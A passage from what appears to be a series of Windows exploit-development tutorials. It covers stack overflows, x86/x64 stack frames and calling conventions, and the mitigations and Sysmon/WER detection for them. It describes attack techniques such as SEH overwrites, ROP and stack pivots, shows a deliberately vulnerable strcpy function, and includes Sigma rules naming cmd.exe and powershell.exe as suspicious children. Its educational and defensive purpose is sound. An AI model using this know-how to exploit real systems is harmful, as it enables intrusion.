| Bad-char-safe encoding | Encode shellcode to avoid protocol-mangled bytes (\x00, \x0a, \x0d) |
| Egghunter / staging | Use a small first-stage to locate or download a larger payload |
| Post-exploit VirtualProtect | Mark injected memory executable to evade software DEP in legacy scenarios |
In practice the attacker chains these: a SEH overwrite defeats the cookie, a non-SafeSEH gadget defeats SafeSEH, and a ROP stub built from non-ASLR module gadgets defeats DEP before transferring to shellcode.
9. Defensive Strategies & Detection
Sysmon does not emit a “buffer overflow” event. The crash surfaces through Windows Error Reporting, and the post-exploitation behavior surfaces through Sysmon.
- WER Event ID 1000 (Application Error, Application log): logs the faulting module, ExceptionCode = 0xC0000005 (access violation), faulting offset, and thread ID. A 0xC0000005 at a non-canonical offset in a network-facing service is high-fidelity.
- WER Event ID 1001: records the crash bucket and any captured dump.
Relevant Sysmon events for follow-on activity:
| Event ID | Name | Relevance |
|---|---|---|
| 1 | Process Creation | Shells/payloads spawned from a crashed service |
| 3 | Network Connection | Reverse-shell / C2 egress from shellcode |
| 7 | Image Loaded | Unexpected ws2_32.dll load by a non-network service |
| 8 | CreateRemoteThread | Thread injection by shellcode |
| 10 | Process Access | Shellcode calling OpenProcess on lsass.exe |
| 11 | File Created | Dropped payloads / second-stage binaries |
| 25 | Process Tampering | Process hollowing following the overflow |
Useful ETW providers: Microsoft-Windows-WER-Diag (crash diagnostics), Microsoft-Windows-Security-Mitigations (WDEG/Exploit Guard triggers, in /KernelMode and /UserMode channels), and Microsoft-Windows-Kernel-Process. Enable Audit Process Creation (4688) with command-line logging and Audit Process Termination (4689) to catch crash/restart loops.
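Crash/restart loops of the kind mentioned above come down to a sliding-window count per process. The sketch below shows that logic in isolation; the event tuples, the function name `crash_bursts`, and the threshold of more than three crashes in 60 seconds are illustrative assumptions, not the schema of any particular SIEM.

```python
from collections import defaultdict, deque

def crash_bursts(events, threshold=3, window_s=60):
    """events: (timestamp_seconds, app_name) pairs sorted by time.

    Returns the (timestamp, app) pairs at which an app has crashed more
    than `threshold` times within the trailing `window_s` seconds.
    """
    recent = defaultdict(deque)   # app -> timestamps still inside the window
    alerts = []
    for ts, app in events:
        window = recent[app]
        window.append(ts)
        while ts - window[0] >= window_s:   # drop crashes that aged out
            window.popleft()
        if len(window) > threshold:
            alerts.append((ts, app))
    return alerts

sample = [(0, "vulnservice.exe"), (10, "vulnservice.exe"),
          (20, "vulnservice.exe"), (30, "vulnservice.exe"),
          (200, "vulnservice.exe")]
print(crash_bursts(sample))
```

Keying the window on the process name keeps one noisy application from masking a burst in another.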
A conceptual Sigma rule keying on repeated crashes of a network-facing service:
title: Repeated Application Crash on Network-Facing Service
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1000
    Application|contains: 'vulnservice.exe'
    ExceptionCode: '0xc0000005'
  timeframe: 1m
  condition: selection | count() by Application > 3
falsepositives:
  - Legitimate software bugs
level: medium
tags:
  - attack.initial_access
  - attack.t1190
Hardening Steps
- Force WDEG / Exploit Protection on network-facing services (mandatory DEP, force-ASLR, SEHOP, heap-spray protection) via Set-ProcessMitigation.
- Build with /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT and audit your pipeline for them.
- Verify SEHOP: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = 0.
- Forward WER Event ID 1000 to the SIEM and alert on repeated crashes of one process.
- Use AddressSanitizer (/fsanitize=address, MSVC ≥ VS 2019 16.9) in dev/test to catch OOB writes.
- Rate-limit oversized inputs at the WAF/NGFW; alert on crash surges.
- Run services least-privilege so successful exploitation yields minimal access.
10. Tools for Stack Overflow Analysis
| Tool | Description | Link |
|---|---|---|
| WinDbg | Kernel/user debugger; !exploitable crash triage | microsoft.com |
| x64dbg | User-mode debugger for live frame inspection | x64dbg.com |
| mona.py | Immunity/WinDbg plugin for offsets, trampolines, bad chars | github.com |
| pwntools | Python exploit-dev framework (cyclic, p32) | pwntools.com |
| ROPgadget | Gadget discovery for DEP-bypass chains | github.com |
| Ghidra | Static disassembly / decompilation for code review | ghidra-sre.org |
| Sysmon | Endpoint telemetry for post-exploitation behavior | microsoft.com |
11. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploit Public-Facing Application | T1190 | WER EventID 1000 crash bursts; WAF oversized-input alerts |
| Exploitation for Privilege Escalation | T1068 | Service running as SYSTEM crashing then spawning children |
| Exploitation for Client Execution | T1203 | Client app (parser/player) crash + child process via Sysmon EventID 1 |
| Endpoint DoS: Application Exploitation | T1499.004 | Repeated crash/restart loops (4689, WER 1000) |
| Exploit Protection (mitigation) | M1050 | DEP/ASLR/SEHOP//GS enforced via WDEG telemetry |
Stack buffer overflow is a vulnerability primitive, not a standalone ATT&CK technique. T1190 and T1068 are the canonical mappings for the adversarial behavior that uses it.
Summary
- A classic stack buffer overflow overwrites the saved return address to hijack EIP and pivot execution into attacker-controlled shellcode via a JMP ESP trampoline.
- The x86 frame places locals, an optional /GS cookie, saved EBP, and the return EIP in a predictable order that linear overwrites exploit.
- /GS inserts a stack canary checked in the epilogue, but does not protect SEH records; the SEH overwrite is the canonical x86 bypass, in turn countered by SafeSEH and SEHOP.
- DEP and ASLR do not stop the overflow itself; they force ROP and info-leak techniques to run shellcode.
- Detect via WER Event ID 1000 (0xC0000005) crash bursts plus Sysmon post-exploitation events, and harden with WDEG, /GS /SAFESEH /DYNAMICBASE /NXCOMPAT, SEHOP, and least privilege.
Related Tutorials
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Understanding the Stack: Frames, Prologue/Epilogue, and Stack Layout
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
Understanding the Stack: Frames, Prologue/Epilogue, and Stack Layout
Objective: Understand how the call stack is organized in x86 and x64 Windows processes — the mechanics of stack frames, function prologue/epilogue sequences, calling conventions, shadow space, and the exact memory layout a debugger reveals — so you can recognize a healthy stack versus a corrupted one and reason precisely about stack-based exploitation and its defenses.
1. Why the Stack Matters for Exploit Development
The stack is the primary battleground for classic memory-safety bugs. Saved return addresses, saved frame pointers, function arguments, and fixed-size local buffers all live side by side on the same contiguous, downward-growing region. When a write runs past the end of a stack buffer, it corrupts the very control-flow data the CPU will trust on the next RET.
For a defender, the same knowledge is diagnostic. A return address pointing into the stack or heap instead of an executable image, an RSP value that jumped thousands of bytes (a stack pivot), or a frame chain that no longer links cleanly are all signatures of corruption. You cannot recognize an abnormal stack until you have internalized a normal one.
2. The Stack as a Data Structure: Growth Direction and Address Space Layout
A Windows process virtual address space holds the mapped image (.text, .data), loaded DLLs, the heap, thread stacks, and per-thread/per-process control structures (TEB/PEB). Each thread receives its own stack, reserved and committed on demand.
The stack grows downward — toward lower addresses. PUSH decrements the stack pointer; POP increments it. The live top of the stack is always tracked by RSP (x64) / ESP (x86).
| Register | Role |
|---|---|
| RSP / ESP | Stack pointer: always points to the top (lowest address) of the current frame |
| RBP / EBP | Base/frame pointer: anchors the frame in x86; in x64 not used for locals/args unless alloca() is used |
| RIP / EIP | Instruction pointer: saved as the return address by CALL |
| RAX | Integer/pointer return value (XMM0 for floating-point) |
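The downward growth described above is easy to see in a toy model. The sketch below is a 32-bit illustration only: the class name `Stack32`, the starting address, and the backing size are arbitrary choices, and nothing here touches real process memory.

```python
import struct

class Stack32:
    """Toy x86 stack: PUSH moves ESP down by 4, POP moves it back up."""

    def __init__(self, top=0x0012FFF0, size=0x100):
        self.base = top - size        # lowest address backed by the model
        self.mem = bytearray(size)
        self.esp = top                # empty stack: ESP at the highest address

    def push(self, value):
        self.esp -= 4                 # decrement first, then store
        struct.pack_into("<I", self.mem, self.esp - self.base, value)

    def pop(self):
        (value,) = struct.unpack_from("<I", self.mem, self.esp - self.base)
        self.esp += 4                 # load first, then increment
        return value

s = Stack32()
s.push(0x11111111)
s.push(0x22222222)
print(hex(s.esp))      # 8 bytes below the starting top
print(hex(s.pop()))    # last value pushed comes back first
```

The most recently pushed value always sits at the lowest address, which is why a buffer allocated later in a function lies below the control data pushed earlier.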
3. x86 Stack Frames: Registers, Calling Conventions, and the EBP Chain
32-bit Windows supports several co-existing calling conventions, which is why x86 reversing requires you to identify the convention before reading arguments.
| Convention | Cleanup | Argument Passing |
|---|---|---|
| __cdecl | Caller cleans | Right-to-left on stack |
| __stdcall | Callee cleans | Right-to-left on stack (Win32 API) |
| __fastcall | Callee cleans | First two in ECX/EDX, rest on stack |
| __thiscall | Callee cleans | C++ this in ECX, args on stack |
x86 code conventionally uses EBP as a fixed frame anchor. Every local and argument is addressed relative to it, and each saved EBP points at the caller’s saved EBP, forming a walkable frame chain.
// MSVC x86, compiled /Od (no optimization)
void vuln(char *src) {
    char buf[64];       // local buffer, classic overflow target
    strcpy(buf, src);   // no bounds check: copies until src's NUL terminator
}
; x86 frame for vuln(), high → low address
push ebp ; save caller's EBP
mov ebp, esp ; EBP anchors this frame
sub esp, 64 ; allocate buf[64]
; ... strcpy ...
; [EBP + 8] -> arg1 (src)
; [EBP + 4] -> return address ← ret-overwrite target
; [EBP + 0] -> saved EBP ← frame chain link
; [EBP - 64] -> buf ← overflow origin
A buffer overflow that walks upward from [EBP-64] crosses the saved EBP, then the return address: the two values the epilogue and RET consume.
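The walkable EBP chain can be followed programmatically, and a corrupted link shows up as a walk that stops early. The sketch below assumes a hypothetical `read_dword` callback standing in for a debugger's memory read; all addresses are made up for the example.

```python
def walk_ebp_chain(read_dword, ebp, stack_lo, stack_hi, max_frames=32):
    """Follow saved-EBP links; return (frame_ebp, return_address) pairs."""
    frames = []
    while stack_lo <= ebp < stack_hi - 4 and len(frames) < max_frames:
        saved_ebp = read_dword(ebp)        # [EBP+0]: caller's EBP
        ret_addr = read_dword(ebp + 4)     # [EBP+4]: return address
        frames.append((ebp, ret_addr))
        if saved_ebp <= ebp:               # callers live at higher addresses
            break
        ebp = saved_ebp
    return frames

healthy = {0x12FF00: 0x12FF40, 0x12FF04: 0x401050,
           0x12FF40: 0x12FF80, 0x12FF44: 0x401200,
           0x12FF80: 0x000000, 0x12FF84: 0x7700ABCD}
smashed = dict(healthy)
smashed[0x12FF00] = smashed[0x12FF04] = 0x41414141   # overflow crossed the frame

for memory in (healthy, smashed):
    frames = walk_ebp_chain(lambda a: memory.get(a, 0), 0x12FF00, 0x12F000, 0x130000)
    print([(hex(e), hex(r)) for e, r in frames])
```

In the smashed case the walk yields a single frame whose return address is filler, because the overwritten saved EBP no longer points into the stack.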

4. x64 Stack Frames: The Windows ABI and Shadow Space
The Windows x64 ABI consolidates every x86 convention into a single calling convention. The first four integer or pointer parameters pass in RCX, RDX, R8, R9; the first four floating-point parameters in XMM0–XMM3. Additional arguments spill onto the stack.
Two rules dominate the x64 layout:
- Shadow space (home space): The caller allocates 32 bytes immediately above the return address, regardless of how many parameters are actually used. The callee may dump RCX/RDX/R8/R9 into this home space if it needs to spill them.
- 16-byte alignment: RSP must be 16-byte aligned at a CALL. Because CALL pushes an 8-byte return address, RSP is 16n-aligned immediately before the call and 16n+8 on entry to the callee, which is why a prologue with no pushes subtracts an odd multiple of 8 (for example sub rsp, 0x28).
Critically, x64 functions typically address locals and arguments RSP-relative, leaving RSP constant for the body of the function. RBP is freed for general use unless alloca() is present.
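The interaction between shadow space and alignment determines the constant in a prologue's `sub rsp, N`. The following sketch computes the smallest such N, assuming RSP is 16n+8 on entry (the return address has just been pushed) and that each saved register is one 8-byte push; `frame_alloc` is a name invented here, and real compilers may reserve more.

```python
def frame_alloc(local_bytes, pushed_regs=0, shadow=0x20):
    """Smallest `sub rsp, N` that leaves RSP 16-byte aligned for the next CALL."""
    need = shadow + local_bytes            # home space for callees + our locals
    entry_skew = 8 + 8 * pushed_regs       # return address + each PUSH in the prologue
    pad = -(need + entry_skew) % 16        # bytes required to reach a 16-byte boundary
    return need + pad

print(hex(frame_alloc(0)))                  # no locals, no pushes
print(hex(frame_alloc(0, pushed_regs=1)))   # one PUSH already re-aligned the stack
print(hex(frame_alloc(64)))                 # 64 bytes of locals
```

With no locals and no pushes the result is 0x28 (0x20 of shadow space plus 8 bytes of padding); after a single push the padding is no longer needed and 0x20 suffices.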
[High address — caller's frame]
Stack arg 5+ ← [RSP + 0x28+]
Shadow [R9] ← [RSP + 0x20]
Shadow [R8] ← [RSP + 0x18]
Shadow [RDX] ← [RSP + 0x10]
Shadow [RCX] ← [RSP + 0x08] (relative to callee entry)
Return Address ← [RSP + 0x00] ← ret-overwrite target
Local variables ← [RSP - N]
[Low address — grows downward]
5. Volatile vs. Non-Volatile Registers and Leaf Functions
The x64 convention splits the register file into volatile (caller-saved) and non-volatile (callee-saved). A function that clobbers a non-volatile register must save and restore it in its prologue/epilogue.
| Class | Registers |
|---|---|
| Volatile (caller-saved) | RAX, RCX, RDX, R8–R11, XMM0–XMM5 |
| Non-volatile (callee-saved) | RBX, RBP, RDI, RSI, R12–R15, XMM6–XMM15 |
A leaf function changes no non-volatile register (including not altering RSP by calling out). A non-leaf function calls another function — which adjusts RSP — and therefore must establish a frame and register unwind data. This distinction drives whether the compiler emits a prologue and .pdata entry at all.
6. Prologue and Epilogue Deep Dive
The prologue establishes the frame: save callee-saved registers and reserve local space. The epilogue reverses it and returns.
; x86 epilogue
mov esp, ebp ; free locals
pop ebp ; restore caller's EBP
ret ; pop return address → EIP
LEAVE is a single instruction equivalent to mov esp, ebp + pop ebp, available on both x86 and x64.
; x64 MASM (ml64) non-leaf frame
sub rsp, 0x28 ; 0x20 shadow + 8 align pad
; ... body uses [rsp+0x..] for locals/spills ...
add rsp, 0x28 ; deallocate
ret ; pop return address → RIP
Many optimized x64 functions omit push rbp entirely and address everything from RSP. Frame Pointer Omission (FPO) saves two instructions and frees RBP as a general register; GCC/Clang do this by default at -O2, and MSVC does similarly with /O2. For exploitation this matters: without a frame pointer there is no [EBP+4] anchor for the return address, so offsets must be computed from RSP at a known instruction.
__declspec(noinline) int callee(int a, int b, int c, int d) {
int local = a + b + c + d; // forces a real frame + homing
return local;
}
int caller(void) { return callee(1, 2, 3, 4); }
Compile this on Godbolt or step it in WinDbg to watch RCX/RDX/R8/R9 home into shadow space.
7. Unwind Data and Structured Exception Handling
x64 Windows requires every non-leaf function to register unwind data in the PE .pdata and .xdata sections so the OS can walk frames during structured exception handling. Each function publishes a RUNTIME_FUNCTION and an associated UNWIND_INFO that describes the prologue.
typedef struct _RUNTIME_FUNCTION {
ULONG BeginAddress;
ULONG EndAddress;
ULONG UnwindData; // RVA to UNWIND_INFO
} RUNTIME_FUNCTION, *PRUNTIME_FUNCTION;
RtlVirtualUnwind() consumes this data to reconstruct caller frames without a frame pointer. For defenders, intact, parseable unwind data is what lets EDR and crash tooling produce a reliable call stack; ROP chains and stack pivots frequently produce stacks that fail to unwind cleanly, which is itself a detectable anomaly.
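Because each RUNTIME_FUNCTION is three little-endian ULONGs and the table is sorted by BeginAddress, finding the entry that covers an address is a binary search. The sketch below works on a raw byte blob standing in for the .pdata section; the helper names and the RVAs in the usage lines are hypothetical.

```python
import struct
from bisect import bisect_right

ENTRY_SIZE = 12  # three 4-byte RVAs: BeginAddress, EndAddress, UnwindData

def parse_pdata(blob):
    """Split raw .pdata bytes into (begin, end, unwind) RVA triples."""
    return [struct.unpack_from("<III", blob, off)
            for off in range(0, len(blob) - ENTRY_SIZE + 1, ENTRY_SIZE)]

def lookup(entries, rva):
    """Return the entry whose [begin, end) range covers rva, else None."""
    begins = [entry[0] for entry in entries]
    i = bisect_right(begins, rva) - 1      # last entry starting at or before rva
    if i >= 0 and entries[i][0] <= rva < entries[i][1]:
        return entries[i]
    return None

blob = struct.pack("<6I", 0x1000, 0x1040, 0x5000,
                          0x1040, 0x10A0, 0x500C)
table = parse_pdata(blob)
print(lookup(table, 0x1050))   # inside the second function
print(lookup(table, 0x2000))   # not covered by any entry
```

An instruction pointer with no covering entry is either inside a leaf function or outside any registered code, which is one reason unbacked addresses stand out during unwinding.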
8. Reading Stack Frames in a Debugger
In WinDbg or x64dbg you read the live frame directly off RSP.
bp mymodule!vuln ; break at the function
g ; run to it
dps rsp L10 ; dump 16 pointer-sized stack slots
r rsp, rbp, rip ; show live pointers
k ; walk the call stack (uses unwind data)
dps rsp L10 prints the raw stack. At function entry, before the prologue runs, the slot at [RSP] holds the saved return address; once the prologue has reserved the frame, the same slot sits above the locals at [RSP + frame size]. k resolves it to module!function+offset. A return address that resolves to no module, or to the stack itself, is the first sign of a hijacked frame.
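The "resolves to no module, or to the stack itself" test can be expressed as a simple range check. This is a sketch with made-up module bases, sizes, and stack bounds; in practice those ranges would come from the debugger's module list and the thread's TEB.

```python
def classify(addr, modules, stack_range):
    """Label a return address as module+offset, 'stack', or 'unbacked'."""
    stack_lo, stack_hi = stack_range
    if stack_lo <= addr < stack_hi:
        return "stack"
    for name, (base, size) in modules.items():
        if base <= addr < base + size:
            return f"{name}+0x{addr - base:x}"
    return "unbacked"

# Hypothetical layout for illustration only.
modules = {"mymodule": (0x00007FF6_10000000, 0x20000),
           "ntdll":    (0x00007FFD_40000000, 0x1F0000)}
stack = (0x000000D2_1E5F0000, 0x000000D2_1E600000)

print(classify(0x00007FF6_10001234, modules, stack))
print(classify(0x000000D2_1E5FF8A0, modules, stack))
print(classify(0x41414141_41414141, modules, stack))
```

Only the first result is what a healthy frame should produce; the other two are the patterns worth alerting on.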
9. How Stack Overflows Corrupt Frame Integrity
Overflowing a fixed local buffer writes past its bounds toward higher addresses, in the direction of the saved frame pointer and the return address.
# Conceptual layout arithmetic — NOT a payload.
# 64-byte buffer sitting below the saved return address.
import struct
buf_size = 64
saved_rbp = 8 # x86: 4
ret_addr_slot = 8 # x86: 4
offset_to_ret = buf_size + saved_rbp # bytes before reaching the return slot
print(f"bytes before saved frame ptr: {buf_size}")
print(f"bytes before return address : {offset_to_ret}")
When execution reaches RET, the CPU pops whatever now sits in the return slot into RIP/EIP and jumps there. A controlled overwrite places a valid, attacker-chosen address (a gadget or function); an uncontrolled overwrite leaves garbage, producing an immediate access violation. The distinction matters operationally: uncontrolled corruption crashes loudly (WER dump), while a precise overwrite can transfer control silently, which is exactly why the compiler inserts a guard between the buffer and the return address.

10. Modern Mitigations and What They Change About the Layout
Mitigations alter the frame layout or the trust placed in it; none remove the need to understand the stack.
// /GS inserts a cookie between locals and the saved frame data.
void vuln(char *src) {
char buf[64];
// prologue: mov rax, __security_cookie; xor rax, rsp; mov [rsp+0x..], rax
strcpy(buf, src);
// epilogue: mov rcx, [rsp+0x..]; xor rcx, rsp; call __security_check_cookie
}
| Mitigation | Structural Effect |
|---|---|
| /GS stack cookie | __security_cookie placed between locals and saved return address; mismatch → __report_gsfailure |
| DEP / NX | IMAGE_DLLCHARACTERISTICS_NX_COMPAT; stack pages non-executable, blocking on-stack shellcode |
| ASLR | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE; randomizes stack/image base, breaking hardcoded addresses |
| Control Flow Guard | IMAGE_GUARD_CF_INSTRUMENTED; validates indirect call targets |
| Intel CET Shadow Stack | CETCOMPAT mitigation; read-only shadow copy of return addresses defeats classic ret-overwrites |
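Several of the mitigations in the table are advertised as bits in the PE optional header's DllCharacteristics field, so a binary's opt-in status can be read from a single 16-bit value. The sketch below decodes that value once it has been extracted from the header; extraction itself is left out, and note that the bit checked for CFG is IMAGE_DLLCHARACTERISTICS_GUARD_CF, with the IMAGE_GUARD_CF_INSTRUMENTED flag living separately in the load configuration directory.

```python
# IMAGE_DLLCHARACTERISTICS_* bits relevant to exploit mitigations.
FLAGS = {
    0x0020: "HIGH_ENTROPY_VA",   # 64-bit ASLR with a larger address range
    0x0040: "DYNAMIC_BASE",      # ASLR (/DYNAMICBASE)
    0x0100: "NX_COMPAT",         # DEP (/NXCOMPAT)
    0x0400: "NO_SEH",            # image uses no structured exception handlers
    0x4000: "GUARD_CF",          # Control Flow Guard (/guard:cf)
}

def decode_dll_characteristics(value):
    """Return the mitigation-related flag names set in `value`, lowest bit first."""
    return [name for bit, name in sorted(FLAGS.items()) if value & bit]

print(decode_dll_characteristics(0x4160))
print(decode_dll_characteristics(0x0000))
```

An empty list for a network-facing binary means it has opted out of ASLR and DEP at build time.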
11. Common Attacker Techniques
| Technique | Description |
|---|---|
| Saved return-address overwrite | Overflow a local buffer to replace the return slot ([RBP+8] on x64 with a frame pointer, [EBP+4] on x86) and redirect RET |
| Saved frame pointer overwrite | Corrupt saved RBP/EBP to desynchronize the frame chain or pivot |
| Stack pivot | Use a gadget (e.g. xchg rax, rsp; ret or leave; ret) to point RSP at attacker data |
| ROP chaining | Defeat DEP by chaining ret-terminated gadgets via the corrupted stack |
| SEH overwrite (x86) | Corrupt the exception handler chain on the stack to gain control on fault |
| Off-by-one / frame-pointer overwrite | Single-byte overflow to truncate or shift EBP, shifting subsequent frame math |
These primitives all depend on knowing the exact offset from a controllable buffer to the saved control-flow data — which is precisely the layout this tutorial defines.
12. Defensive Strategies & Detection
Detection focuses on the crash artifacts and post-exploitation behavior that stack corruption produces, since the corruption itself is often only visible at the moment of RET.
| Signal | Detail |
|---|---|
| Windows Error Reporting | Access violation at abnormal RIP; dumps under %LOCALAPPDATA%\Microsoft\Windows\WER\ReportQueue; Application Event 1000/1001 |
| Sysmon Event ID 1 | Unusual child process from document/browser renderers (T1203 follow-on) |
| Sysmon Event ID 10 | Cross-process stack reads via ReadProcessMemory |
| Security Event 4672 | Special privileges to an unexpected logon (T1068 follow-on) |
| ETW Microsoft-Windows-Kernel-Process | Anomalous RIP/RSP deltas via call-stack sampling (stack pivot) |
| ETW Microsoft-Windows-Security-Mitigations | Emits events when CFG, DEP, or Shadow Stack violations are blocked |
A practical first-line Sigma sketch catches the most common post-exploitation chain — a renderer spawning a shell:
title: Suspicious Child Process From Document Renderer
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\WINWORD.EXE'
      - '\EXCEL.EXE'
      - '\AcroRd32.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\wscript.exe'
  condition: selection
level: high
Hardening checklist: compile with /GS (verify no /GS-), link /NXCOMPAT and /DYNAMICBASE, enable CFG with /guard:cf, turn on CET via SetProcessMitigationPolicy(ProcessUserShadowStackPolicy, ...), enforce /SAFESEH on x86, and configure Windows Defender Exploit Guard for legacy binaries. MITRE mitigation M1050 (Exploit Protection) bundles these OS controls.
13. MITRE ATT&CK Mapping
Stack layout knowledge is foundational rather than a single technique; the mapping below frames it in the defensive direction — recognizing the artifacts each technique produces.
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Sysmon EventID 1 renderer child chains; WER crash dumps |
| Exploitation for Privilege Escalation | T1068 | Security EventID 4672 unexpected source process |
| Exploit Public-Facing Application | T1190 | Service crash loops + WER on network-facing daemons |
| Reflective Code Loading | T1620 | ETW call-stack anomalies; non-image-backed RIP |
| Process Injection | T1055 | Sysmon EventID 8/10; abnormal cross-process access |
14. Tools for Stack Analysis
| Tool | Description | Link |
|---|---|---|
| WinDbg | Kernel/user debugging, k, dps, unwind walking | microsoft.com |
| x64dbg | Live user-mode stack inspection on x64/x86 | x64dbg.com |
| Godbolt Compiler Explorer | View prologue/epilogue and FPO across compilers | godbolt.org |
| Ghidra | Static reconstruction of frames and calling conventions | ghidra-sre.org |
| Process Hacker | Live thread stacks and call-stack walking | processhacker.sourceforge.io |
| NASM | Assemble illustrative prologue/epilogue snippets | nasm.us |
| GDB + pwndbg | Cross-platform frame and offset analysis | gdb.gnu.org |
Summary
- The stack is a downward-growing region where buffers sit beside the very return address the CPU trusts at RET, which is why it is the primary target of memory-safety exploits.
- x86 frames anchor on EBP with multiple calling conventions; x64 uses one convention, RCX/RDX/R8/R9 parameters, 32-byte shadow space, 16-byte alignment, and RSP-relative addressing.
- The prologue saves non-volatile registers and reserves locals; the epilogue (LEAVE/RET) reverses it; frame-pointer omission removes the [EBP+4] anchor and forces RSP-relative offset math.
- Overflows corrupt saved RBP/EBP and the return address; /GS, DEP, ASLR, CFG, and CET Shadow Stack change the layout’s trust model but not the need to understand it.
- Detect follow-on activity via WER dumps, Sysmon EventID 1/10, Security 4672, and ETW mitigation/call-stack events, mapped to T1203 and T1068.
Related Tutorials
- Classic Stack Buffer Overflow: Smashing the Stack on Windows
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V
Objective: Understand how the five major calling conventions (cdecl, stdcall, fastcall, the Microsoft x64 ABI, and the System V AMD64 ABI) dictate argument passing, register ownership, stack cleanup, and alignment, and exactly why those rules determine where return addresses and arguments sit in memory when a vulnerability is triggered.
1. Why Calling Conventions Matter for Exploit Development
A calling convention is the contract between a caller and a callee. It specifies how arguments are passed (stack or registers), where the return value lands, which registers the callee must preserve, and who cleans up the stack. None of this is arbitrary — it is fixed by the ABI for a given platform and compiler.
For a defender or authorized red-teamer, this matters because stack layout is deterministic. When a local buffer overflows, the bytes that land on the saved return address are determined entirely by the convention in force. Reliable overflow payloads, return-to-libc chains, and ROP gadgets all depend on knowing precisely where the return address, arguments, and saved registers sit. Get the convention wrong and your offset math is wrong.
2. Stack Mechanics Refresher: PUSH, POP, CALL, RET
The stack grows downward (toward lower addresses). PUSH decrements the stack pointer (ESP/RSP) and writes; POP reads and increments it.
- CALL target pushes the return address (the next instruction’s EIP/RIP) onto the stack, then jumps.
- RET pops that saved address back into the instruction pointer.
- RET N pops the address and adds N to ESP; this is how a callee cleans caller-pushed arguments.
push arg1 ; arg on stack
call foo ; pushes return address, jumps to foo
add esp, 4 ; caller cleans 1 dword arg (cdecl)
Because CALL writes the return address to a predictable slot, any write primitive that reaches that slot redirects control flow. Every convention below differs only in how the arguments around that slot are arranged.
3. x86 cdecl: The C Standard
__cdecl is the default for C functions on 32-bit x86 (MSVC flag /Gd). Arguments are pushed right to left, and the caller cleans the stack. The return value comes back in EAX. C names are decorated with a single leading underscore (_foo), no case translation.
Because the caller cleans up, cdecl is the only x86 convention that supports variadic functions (printf-style va_list) — the callee never needs to know the argument count.
; foo(1, 2, 3); -- cdecl
push 3 ; rightmost first
push 2
push 1 ; leftmost last
call _foo
add esp, 12 ; CALLER cleans 3 dwords
Canonical x86 stack frame after the prologue (high → low address):
[arg N] ← pushed first (rightmost)
[arg 2]
[arg 1] ← pushed last (leftmost)
[return address] ← pushed by CALL
[saved EBP] ← pushed by prologue (PUSH EBP)
[local vars] ← ESP after SUB ESP, N
The saved EBP and return address are the primary targets of a stack-based overflow. Overflow a local buffer and you overwrite them in that exact order.

4. x86 stdcall: The Windows API Convention
__stdcall is the convention for the Win32 API. Arguments still push right to left, but the callee cleans the stack using RET N. This is efficient for fixed-argument functions, but it forbids variadics.
Name decoration encodes the byte count of stack arguments: a leading underscore, an @, then the size in bytes (always a multiple of 4). MessageBoxA with four pointer/int args becomes _MessageBoxA@16.
; foo(1, 2); -- stdcall, two dword args
push 2
push 1
call _foo@8
; NO add esp here — callee handled it
foo:
; ... body ...
ret 8 ; CALLEE pops 8 bytes of args
For shellcode and custom loaders, the @N suffix matters when resolving and patching the Import Address Table: the decorated name must match the export.
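The practical difference between caller cleanup and callee cleanup shows up when the two sides disagree. The sketch below tracks only ESP through one call; `esp_after_call` and its parameters are illustrative names, and the model ignores everything except argument pushes, CALL, RET/RET N, and the caller's optional add esp.

```python
def esp_after_call(esp, arg_bytes, callee_conv, caller_assumes):
    """Return ESP after one call, given who each side thinks cleans the stack."""
    esp -= arg_bytes                  # caller pushes the arguments
    esp -= 4                          # CALL pushes the return address
    esp += 4                          # RET pops the return address
    if callee_conv == "stdcall":
        esp += arg_bytes              # RET N: callee removes the arguments
    if caller_assumes == "cdecl":
        esp += arg_bytes              # add esp, N: caller removes the arguments
    return esp

start = 0x0012FF00
print(hex(esp_after_call(start, 8, "cdecl", "cdecl")))      # balanced
print(hex(esp_after_call(start, 8, "stdcall", "stdcall")))  # balanced
print(hex(esp_after_call(start, 8, "stdcall", "cdecl")))    # cleaned twice
print(hex(esp_after_call(start, 8, "cdecl", "stdcall")))    # never cleaned
```

A mismatch leaves ESP off by exactly the argument size, which is the kind of drift that shows up as a misaligned stack when a function pointer is cast to the wrong convention.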
5. x86 fastcall: Register-Based Argument Passing
__fastcall (MSVC flag /Gr) passes the first two integer arguments in ECX and EDX; remaining arguments push right to left, and the callee cleans them. Decoration uses a leading @ (e.g. @foo@8). All __fastcall functions must have prototypes.
; foo(1, 2, 3); -- MSVC fastcall
mov ecx, 1 ; arg1 in ECX
mov edx, 2 ; arg2 in EDX
push 3 ; arg3 on stack
call @foo@12
⚠️ Compiler variance: __fastcall is not standardized across compilers. MSVC uses ECX/EDX. Borland passes the first three arguments in EAX, EDX, ECX. When reversing a non-MSVC binary, verify register usage before trusting any decompiler’s __fastcall label.
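The three x86 decoration schemes covered so far reduce to a small formatting rule. The sketch below applies the MSVC C-linkage rules described in the sections above; the function name `decorate` is invented here, and C++ name mangling is out of scope.

```python
def decorate(name, convention, arg_bytes=0):
    """Return the MSVC-decorated C symbol for a 32-bit function."""
    if convention == "cdecl":
        return f"_{name}"                    # leading underscore only
    if convention == "stdcall":
        return f"_{name}@{arg_bytes}"        # underscore + @ + argument bytes
    if convention == "fastcall":
        return f"@{name}@{arg_bytes}"        # leading @, register args counted too
    raise ValueError(f"unknown convention: {convention}")

print(decorate("foo", "cdecl"))
print(decorate("MessageBoxA", "stdcall", 16))
print(decorate("foo", "fastcall", 12))
```
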